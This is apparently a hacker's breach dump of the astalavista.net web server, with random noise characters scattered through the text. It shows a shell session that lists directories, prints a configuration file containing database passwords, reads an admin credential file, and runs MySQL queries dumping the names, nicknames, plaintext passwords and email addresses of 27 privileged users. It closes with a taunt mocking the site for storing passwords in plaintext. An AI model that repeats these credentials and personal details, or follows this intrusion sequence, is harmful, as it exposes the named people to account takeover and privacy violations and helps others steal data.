5 T( I5 d* N) p: t' w5 s$ z# Xdrwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .
" d  d- t- Q5 c9 xdrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
) [7 t# }2 P" C( ^  Y- ydrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
8 f) l, h9 A7 F! a' A' y! p% W8 S-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
+ @/ M: a1 B  L. |-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
2 _$ g2 A. {% o" X* M-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile' I* f/ E% y: S$ ]" i8 t
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc# {6 x) B, k  ?1 R8 X( n& u
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
/ T- U0 ~/ Q4 D- c$ e  ]$ W* |drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
  e! o9 k" L' s4 p2 x5 q3 c  Qdrwx——  2 astanet astanet 4096 Dec 23 12:18 mail
! B0 \% i& B" H& _  Xlrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html9 E2 }/ j6 J; j0 O0 F
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
8 h) Y' j, A, i& H  }, Y3 K* b$ X$ M" w
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
0 t3 x! z4 Z. a7 Fsh-3.2$ ls -la4 o0 c7 n* o9 [, Q+ e
total 200" n' U8 P1 b. T$ t- y. v! T4 m5 e
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 .# d* f) n: s. v; P* Q& p9 q2 e
drwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..
. p7 z% F+ D/ L8 @& W3 z! E' Cdrwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007
! e5 P% N$ }" b* i4 G) @drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql
, G# [, I2 l8 g4 {drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com. ~6 X/ n# F2 j, ]5 E
drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend
0 t! P4 y: B0 T/ z2 K) Adrwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
. a' h1 K4 n" k4 z, }-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg
) B! r+ m( l+ Y0 Q* {3 Bdrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config
% G  |  A5 I5 X8 V- Udrwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
# R/ U4 R4 h) Z& }: w7 o" |drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd( C. u5 z6 h1 H8 @9 q
-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php
3 l: q! S" V% ]6 ^( M-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico& w. d* b( g9 q1 S  p, g0 M
drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed) i3 [  C" U  g5 x6 y1 G' m
drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour: Y- ]8 Y% j% J" p2 ?. _
-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess, q( N" }2 v, ?  }
-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess! u' l+ @9 [0 X8 _% e# L
-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php
8 e$ x8 x$ h- ?4 a  e* S-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html
, `" Z# J; p5 l+ W1 x8 V-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php
- M2 g3 G6 R8 _- A: i4 n1 z-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php4 j6 p, z* M6 y$ F$ D* ?
-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf/ T3 i. B. y, e' O) ]3 h( D
drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc6 W# G7 A3 ~6 Z0 C2 i
drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
+ u/ Y% }) {# ^drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib- [- W' I5 I3 d7 L
drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
: r; W: [; y% Z$ m) ?* Q% Z# cdrwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member1 v/ h8 L) g: V4 T
drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
3 J/ O( G" z. N* A0 c6 Xdrwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new3 @5 H$ G+ k; w8 _9 P4 U; `5 }* R4 p( v
-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf, Y; N9 _9 e+ a0 S
drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re; Z1 U% ]6 v* C/ _6 J. ]4 w
-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt4 f4 A" V" b' I5 v- r/ q
drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
6 R# W/ ^/ ~2 x5 p8 mdrwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
6 r/ R; r$ G' R+ M3 ]" Z' G; c9 Bdrwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com. G5 R. }4 \" G% `
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes
$ j8 \( D8 J- r9 t& Q( Xdrwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
( ~% ?5 C" u- Idrwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
: @2 W5 N* [1 e  adrwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2" h* g2 Y/ d1 I# ]' l6 T3 ^
drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old* X2 S) Y" s& |$ G, z2 f- D
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php( |, R4 J+ t+ L8 X* a
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
7 X) B% {  Z+ n* F  y- z
$ F0 r$ ]2 ^4 i9 T. G) g; [sh-3.2$ head -20 index.php
  O* ], S0 C* ^' g/ K( @<?PHP
* u& I4 R+ J. e/**
: O7 }3 z) v/ v0 `4 S* Mainfile (external) for astalavistaNET v2.04 }0 ^9 y8 `) _1 a/ D
*) o: j% @) j5 d
* @copyright     Astalavista IT Engineering GmbH
; r( u6 {0 ~5 v- a3 ]. z* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
- ?% w6 @, n* |- F* @version       1.06 ?$ a8 {! ^6 Z! Q  L
*/6 T4 m9 r3 K# b/ {3 K
8 x6 h6 O" p' S' o/ H" r
        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
: P9 E  |8 b* V# I' R8 t                $dontStartSession = false;4 f4 ]' S3 i/ B% h9 t7 I
        } else {
: R3 u5 x6 m9 F! v" {+ ?" r3 u                $dontStartSession = true;
0 S  I6 M" y% `" }4 ^! u0 l        }
- O2 w* I3 p5 y  v% g! x$ D9 ^        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);" j# p, R7 c2 F) Q$ X. q
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
+ b! ]! z: D/ i8 W% A! _        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
" N/ n$ D  E" m        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);' y) [7 M* E# J' z5 U, t+ g8 E* j& i& r

- ?$ \3 z- \8 Q' M: Tsh-3.2$ cd config* v8 @( _! `% \3 m+ _$ r$ n
sh-3.2$ ls -la/ q$ x* a4 p* n3 M$ p8 t6 B1 M% A
total 32+ C- g; S) p' |- f: W
drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
3 p$ H# y  s0 ?" A% b4 E: x0 Xdrwxr-x— 29 astanet apache  4096 Jan  6 13:58 .., G9 E& m$ ~: d; {& f! A
-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php7 ]. y( m+ \* ^4 i7 j2 Y& [2 B
-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php1 X0 p) e  |6 p3 M" e# z9 Q
-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php
" d6 W9 A1 g4 B) L-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php
- z/ o/ t* q3 l0 u" \-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php
, e/ U$ z/ U: L9 b, g; @4 S/ E
7 J! A9 |! b: q: Bsh-3.2$ cat com.conf.php
  u  W9 Y+ k3 V; U. P1 f[snip]9 b1 r  N2 A. V& }% q. u% l
//member-database
: O+ u2 {- i. g4 [0 x& Q$_CONFIG['db_mem_server']       = ‘localhost’;3 @5 z+ M' }3 A, M$ |- ?& I  E# D
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
! D; r; U% R9 a* H$_CONFIG['db_mem_user']         = ‘astanet_db’;
  M4 V( }( ]" }) |$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;' A/ `+ H% A' r' z2 I
$_CONFIG['db_mem_debug']        = false; //true or false  @% l" T6 W9 ?$ O6 @( H
//ads-database
+ A2 Y& W& w: F/ G' A* y% P$_CONFIG['db_ads_server']       = ‘localhost’;. s7 \: e* u3 v4 r' u% t# F: f6 }2 z
$_CONFIG['db_ads_database'] = ‘astanet_ads’;, s% n3 e; z, V0 ~( @
$_CONFIG['db_ads_user']         = ‘astanet_db’;1 A: t6 h. f. R- V
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;7 ?+ D6 \; z) p! f9 r/ b
$_CONFIG['db_ads_debug']        = false; //true or false  w* g3 Q3 p5 M: |# I7 b
//rainbow-database8 M1 H( E4 F+ |! N  s) Y3 i' T
$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;
1 Q- ^5 y: _/ q4 }( C, p$_CONFIG['db_rainbow_database'] = ‘rainbow’;% @. y- Z! s) P# E
$_CONFIG['db_rainbow_user']     = ‘dinu’;
0 A: ^/ _6 l" p* `* F) s* ~$_CONFIG['db_rainbow_password'] = ‘dinudinu’;! W% \2 M; Z4 n* S. k: W
$_CONFIG['db_rainbow_debug']    = false; //true or false
% E% b$ m( m7 u4 S7 I//mailing lists database
$ o9 Q- j9 i9 ]0 ^* ]) Q$_CONFIG['db_mailing_lists_server']     = ‘localhost’;  f) y1 b# O; D$ \" [
$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;  L5 p6 j' Q" E& H, ]- o
$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;
/ E& {  M( B/ {7 s. t3 C( p$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;- A  U  X& k" j' T* X% N3 _
$_CONFIG['db_mailing_lists_debug']              = false; //true or false2 ~3 \/ A; l+ g" y# H; S
//paypal
  `' i7 L: O! V; @0 ~$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;/ c6 U3 C; T# ^3 _, S6 i! X
$_CONFIG['sub_pp_cmd']          = ‘_xclick’;. R4 @- o$ C/ H: ^
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;* p0 s# t/ k# `5 }& z
$_CONFIG['sub_pp_noship']       = ‘1′;, [5 s5 I( h9 r* P  ^
$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;7 d' _) A; I/ a* `$ l/ t
[snip], A, {0 S) u6 x2 C8 k
4 ~8 e: K0 t8 o& u3 X$ \
sh-3.2$ cd ..% R! t/ d9 V/ g
sh-3.2$ cd member
7 m( E/ z# q( B1 L0 v, f+ Bsh-3.2$ ls -la
; r( K$ k& L) Atotal 208 T$ f0 w: Q0 e* d
drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 ./ K' e* O0 h" B. @% Y; U5 F+ D
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..% ?$ P! F% K# M
-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess9 U0 z7 K. L1 P+ a3 G# _
-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php0 U" g; i/ P- Y0 d( p0 ?
sh-3.2$ cat .htaccess
! f6 {; G/ x; _  n0 t1 z) aSecFilterEngine off: W: `: {4 C2 h% p% d8 i

5 ]8 l- x9 j2 P, vsh-3.2$ cd ..+ s0 }! ^/ Z2 m2 f* g7 J0 |( w
sh-3.2$ cd cron5 a: P) q7 o, B1 |* x: a" `9 t
sh-3.2$ ls -la! _5 C/ |/ I1 d* F6 E0 y- c/ h
total 1682 Q( z. w$ ?8 g8 d: X
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .* o2 M0 A2 a1 Y) `1 ~
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..
4 r* q+ v  B# H& h  |( {( }& U-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php0 {5 f1 j) L. \# a, X# n
-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php
! ?: q! u5 }6 L( I-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
/ K; C% V9 @$ n  `* l% d-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php$ J  H- i. U6 f( u1 c& U
-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php5 C! T& M, y; B/ s
-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php
0 U: k) ?4 e6 x  N6 f* k-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
% _3 S* i+ V3 S! ]7 k9 t% D-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php+ b- y- h+ ]5 H$ e& X) J
-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
& l$ O( U4 E% e/ }6 ?& ~" ]$ W-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
  d8 ^. g& e2 K& i$ [# D' P-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
( _% V  ?, Q5 b" X2 ?& t+ j4 f0 z-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php
$ u$ P: o& e0 M/ [-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
9 w: R. c3 R* d, u7 F% S-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
5 w4 x9 J' H" Z, ^. v  k3 f-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php6 l5 z. [4 F- P" B9 z+ Z
-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php1 I1 x) u# r% s0 l# `
-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php
: U5 a, c# x- G3 t. P0 r' F% H-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php
' i, T+ p& \( _- P$ S0 Vdrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
9 e  r7 c' u( F5 k* O-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php8 Z4 o6 q: ]+ c# {2 Q
-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php5 T9 J; a6 D# r" [3 X! e4 a
  |* F' j+ p3 |( F* x
sh-3.2$ cd ..
8 X1 ]3 @5 S+ m5 nsh-3.2$ cd _007
! {: |! I1 M; s( d, zsh-3.2$ ls -la' E! u. @. X# t! s: U* d9 N
total 24( _: s& g: [! J' s
drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
0 B, W) t! J" j" [% \) p( |* cdrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..3 ]/ B( g( S( \8 Q
-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess
2 X* N: |' U, L0 h. O2 \$ ^-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php8 I/ o6 z* G9 n. t
-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
( i4 r; |8 ~4 u& e1 h0 Q9 \$ T7 m7 r" jdrwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap* K2 }( g; R; u0 }+ s
' z5 t1 ~. M" z4 L6 x
sh-3.2$ cat  .htaccess
4 Y# `5 }: g" m3 m5 E, kauthType Basic! z+ ?1 g6 W0 A  C8 S8 _
authName Admin
* O" }2 w8 [* S8 ~6 Z! sauthUserFile /home/astanet/auth/.htadm_pwd
+ D* P; H# }' Urequire valid-user9 K! P. H$ Q% H4 K5 A9 q- s  `
2 q0 w% N: m3 D2 Z+ X
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
0 i3 K. g* `+ a5 f# }/ madmin2net:CR0bl65MwhfT
5 O5 j! r' |* d4 u" j! u! I, ]9 v# |/ `+ H/ g" `1 g
sh-3.2$ mysql -u astanet_db -p, H/ W; k' w/ `1 \# V) \/ T
Enter password:% Q$ q6 M  V9 ?( [4 O( r9 b
Welcome to the MySQL monitor.  Commands end with ; or \g.) L4 v/ ^/ \; J" E. {& v
Your MySQL connection id is 275153# v# w: I3 u1 |9 D: n+ V, Z1 r
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
; B$ _; ]8 W; q0 ]7 n6 _* F8 n& e: \0 N( a( |6 V
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.1 J/ {. p# e' |$ I, M; E1 Z, ]
& K1 ~2 b% x1 L* o
mysql> show databases;9 x) e; j- K$ k
+———————–+
! I/ |4 L( {8 I# ?0 T: e| Database              |3 @5 i0 G' h0 I% S8 ^* E9 c
+———————–+
: J( j1 l- h" r7 u: C4 T/ v( E' r| information_schema    |
4 r/ ^, ~( e2 N| astanet_ads           |
/ f8 B9 @8 Z0 t2 m| astanet_mailing_lists |- A- n( i* V7 C9 I7 u# n. n4 D
| astanet_mediawiki     |
& T- l2 I# s/ _# w| astanet_membersystem  |
9 U3 S$ }( V" a| test                  |$ R! c4 T  j4 ]! n5 s
+———————–+
9 l6 Z' h1 w& _* l6 D6 rows in set (0.00 sec)
  b8 a9 @( i* H% R! C% ^* i0 v" R. c1 U" h0 X" u+ l; b
mysql> use astanet_membersystem
! x7 w* b* h4 r1 Y! CDatabase changed
; ]! W* Y% v; p  pmysql> show tables;2 o5 V( ~% g/ Y4 d0 ~+ W. ]4 b, g# ?
+———————————–+
* ?( z* o1 e4 @% ^2 ]. @| Tables_in_astanet_membersystem    |
* ?+ [( R) i7 j7 E+———————————–+
3 B, L: Y( ^; I! U5 i| blacklist_categories              |
* b& G4 M- U6 G: b; C* x3 i/ || blacklist_content                 |
/ [$ ^3 }  w+ a. ]: q" r| blacklist_levels                  |
! U( L+ x4 p6 i* N6 t| blacklist_mcset                   |4 ?* n! E4 x; p6 |2 D! q
| dir_categories                    |
0 C7 y! j+ a0 y9 s! N| dir_comments                      |
  ~, @+ L1 s* E, r1 C| dir_links                         |8 @# b" X3 i% |& T) P
| dir_temp                          |
! k) r- g# H/ V! L* e6 e7 Q( k| dir_votes                         |
! H) g1 J4 O7 a* F| documents                         |
4 c- v+ W' s, Z| documents_categories              |5 Z' B9 T% D" O
| email_content                     |+ ^5 j0 t$ \# k! {8 c- z% z
| email_settings                    |8 k$ B# q# T) P: ~
| exploits                          |& g; G; h! Q0 Q" t
| exploits_categories               |
6 A! g1 m9 T3 g% u% e| exploittree_categories            |
( M" N- i4 G& L/ ^, U. y2 B8 j- U| exploittree_exploits              |
" r- Z; [( Y# j+ [; P| home_values                       |( V1 [1 b1 b3 p: I( _& E$ ]0 f  Q/ h
| iso_countries                     |
$ u- _- ~  o; L4 D! P4 {+ N| links_categories                  |  O) C5 N. @7 J- I- n
| links_records                     |
* ^1 y6 k1 y+ {3 s- m" @. q| links_unauth                      |
& ^" o0 ]7 L# a| links_votes                       |
1 O" R( {  M& g: E* t/ Z, }. M| log                               |) ^' d4 d( B6 i. g6 x" k+ @
| news_categories                   |! E% d. ?+ w  s; x8 `- _
| news_comments                     |+ D' |; d+ H, W
| news_emoticons                    |
' {* g5 ~! N  w0 [| news_latest                       |! D6 S7 y; {) H% L7 M7 O; D
| news_messages                     |4 p1 u. E5 X8 p( c7 P$ l
| news_statistics                   |
2 w# J  A8 {1 n- E- d" C| news_votes                        |* Q3 K) q: f3 b2 e  @9 W% N" X" v
| prices_content                    |
( d( Q# B6 n) f/ ?; w2 A% w| prices_offers                     |, |/ @% y7 y# _7 i
| rss_settings                      |, R6 ?2 }( V' ?" G
| sessions                          |
3 F, u  z' q: o2 z$ m| stats_signups                     |$ \3 }2 p' M' \$ Z7 P6 K& h, Z
| u2u2                              |+ c9 k3 L3 h% d) C7 {4 O* F1 R1 S
| u2u_contact                       |
  b# T6 ~8 p" x2 L1 u; T. y| u2u_settings                      |9 v1 u2 q# Y6 n
| user_keywords_selected_categories |
  K7 u) D& q$ s| users                             |+ i: y+ i& r/ ^+ I0 G$ ]  Z& U  z
| users_ipn_test                    |6 B: ]8 t8 H% e8 w/ x
| users_keyword_values              |
4 p- h) r# P8 x0 F4 X| users_profile                     |
, f* t( z1 Z! r0 b2 e5 k' c| users_temp                        |% t. s% K1 x8 W4 `, U; W. I$ e
| users_upgrade                     |
* p" s1 B5 x4 R" z7 ?0 A+———————————–+$ e$ R% C: [0 R5 X% q
46 rows in set (0.00 sec)
) A9 w% i: Y4 }; |+ q4 L
- U9 S# k& A# g8 W, Q& Amysql> describe users;
0 s* ^0 j+ e1 U3 M# U+————————–+————————————–+——+—–+———————+—————-+% b3 V7 d2 b6 k: D* t! p7 h  @
| Field                    | Type                                 | Null | Key | Default             | Extra          |- H' O& ^' o+ I. I3 A% \, K
+————————–+————————————–+——+—–+———————+—————-+, ~& K' `! z/ y: h
| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
: S, k- b! q' j. o- ^| user                     | varchar(50)                          | NO   |     |                     |                |
0 `( I4 P6 N1 t5 F. I# o| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |9 H$ p* c% o  s8 M
| password                 | varchar(30)                          | NO   |     |                     |                |
: p9 i/ x& x! t, R5 ^9 E| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |
, Z! U3 {" D& h' q| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |" E  V: T0 G, x
| email                    | varchar(50)                          | NO   |     |                     |                |
2 ^& Q8 u2 z7 _| ip                       | varchar(15)                          | NO   |     | 0                   |                |/ j- a& [, t9 ]
| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |  V# S; r# G0 r# |* X% t$ a
| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |+ w3 d" B; ^" _3 i7 z& |" n
| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |
  [9 T% q$ t$ ~1 {4 H| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |$ i4 |9 V& Q4 D, G
| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |( n  y- [$ M- A3 }$ ?" r3 M
| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |
7 [% W5 M( j- R3 L- z6 G- B. g| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |/ o' C0 ]/ c' i5 e
| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |
$ Y5 ]1 t) h  N" _9 K- D) G| lang                     | tinytext                             | NO   |     |                     |                |
% d; p. b. Z! N( T; b; U- h| adid                     | smallint(6)                          | NO   |     | 0                   |                |
0 y5 C  x; @3 M' ?2 g| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |) ~2 `: K1 j0 H/ e! ]* E. j; k$ D
| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
( A, J; S# X. }1 B| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |
3 m& ]* M7 U9 F/ J" _| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |
8 n) e7 F* s6 d8 Y. l8 g0 \! t+————————–+————————————–+——+—–+———————+—————-+) O( _' L; Z9 t$ ^  ^6 Y( [. p
22 rows in set (0.01 sec)
% R5 x! S/ F( V& y( x" A8 t; Y$ q6 v  I/ I
mysql> select count(*) as skids from users;
5 }: L$ E' V0 S- m, U+——-+- l  }0 [+ e( a6 s' J( g* L
| skids |
) E2 V6 {3 J& l" H9 X6 l+——-+
: t: ?, b% _. d1 i| 25199 |
. c5 W1 v: ?. l! z/ a" _4 @" i4 \+——-+
. n# I- u5 O5 q, |; c1 row in set (0.00 sec)1 B3 K- [! l+ K# C+ i- J2 s

: B0 h' V* s6 `8 ^9 j  f6 Vmysql> select user,nickname,password,email from users where userlevel = 1;- L/ v7 R0 J7 }: u: s# w
+————————–+———————-+——————+———————————–+8 l' r" d/ }. V" @3 s9 _
| user                     | nickname             | password         | email                             |! l, R3 _( t& Q  C# l8 K! j- r
+————————–+———————-+——————+———————————–+
- l; n6 n7 k" |# W" }| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |2 E& [9 d7 f( Q6 \
| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |
8 e; V" G+ m& G: i* U| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |
8 Z$ B5 L" Z6 D9 E' p2 ?' I0 K, A, N| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |* [4 I1 M9 N( q+ W
| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |
1 Q7 x0 A$ m& t| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |
! @! A2 w1 {, N4 f. ^/ n5 N| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |; U2 p7 p. Z1 W7 Y& G/ l
| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |, Z' i/ a5 e3 w
| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |3 m7 [6 b3 Q9 S4 e8 r: f
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |7 i. F8 H5 e' [# w: P
| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |) P; I$ q9 i$ Z( ~+ N1 y5 R
| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |: w& y( V( P+ K3 p) \# r* \
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |
$ B0 d, `+ X9 y  R+ n- D| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |
7 D; A( D  G: d% L. y1 z| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |! A. v! u+ p: a+ o6 r- S3 o
| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |
% ^8 p1 O) L% B, x/ q6 D| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |
6 T) }; B3 i( Q* t- i/ y) z| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |
- c, F0 {, ~, x8 p/ d, N4 o| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |' D/ }" x/ L+ P
| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |2 t0 k) R9 W+ Y6 F) d" T$ t1 p
| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |/ p+ O7 w' _3 @" O4 P
| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |
4 `  d! A! L+ ~* Q, B" @! J| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |: }8 S3 G5 \( G. H2 ^& s  R( e9 q
| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |# S0 X  M5 X- ]
| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |/ h( M! i5 G- I
| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |  a3 L6 v: g& U- q8 w& q  c
| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |$ h5 }, s0 I4 q& h
+————————–+———————-+——————+———————————–+
, F+ R% J' B0 Q) e& x9 e, D$ _9 F4 o27 rows in set (0.00 sec)$ ]7 x9 v% b" h# t. C% w: P

3 r4 K& f6 z. z8 g6 O; _! `mysql> exit;
, E" z8 `: D9 t) e9 x" _Bye
  d- y+ ^" U6 s; @- k1 I$ X% k" u/ H6 i1 `/ v6 `% e
[~] plaintext passwords? yes,+ J8 `, M: C. N
Those so called “security professionals” who charge you $6.66 / month to
1 A8 C0 h1 h* Dregister at their hack-proof portal, save your passwords in plaintext…
8 z% ]/ G5 w# m7 ?6 `  _brilliant!, K  Z3 u0 i0 Z, ^" g! i( y

7 N, O" b" N$ {2 Q/ K' h[~] This been fun but we want more.+ b) Q6 h* ?" N: P- Z; `0 z( C* H
